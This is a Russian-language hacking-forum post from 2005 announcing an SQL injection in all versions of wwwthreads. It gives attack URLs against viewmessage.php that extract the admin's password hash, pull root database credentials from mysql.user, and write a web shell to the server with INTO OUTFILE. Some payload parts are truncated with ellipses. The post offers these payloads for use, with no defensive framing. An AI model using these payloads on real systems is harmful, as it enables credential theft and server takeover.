Тема
:
Безопасность & Хакерство
Показать сообщение отдельно
wwwthreads [all versions] - SQL-injection
#
6
12.06.2005, 09:06
k00p3r
Banned
Регистрация: 31.05.2005
Сообщений: 549
С нами:
11023586
Репутация:
16
wwwthreads [all versions] - SQL-injection
Уязвимость позволяет получить DES-хеш любого пользователя, создать веб-шелл, получить доступ к важной служебной информации. Использование:
Получение хеша пароля:
http://target/viewmessage.php?Cat=&m...om%20w3t_Users
where U_Username='admin'
Получение учетных записей к БД:
http://target/viewmessage.php?Cat=&m...m%20mysql.user
where User='root'
Создание веб-шелла (при наличии прав на запись):
http://target/viewmessage.php?Cat=&m...б_шелла
into outfile 'path_to_file/file.php'
Источник:
www.cyberlords.net
k00p3r
Посмотреть профиль
Репутация
Посетить домашнюю страницу k00p3r
Найти все сообщения от k00p3r
Добавить в друзья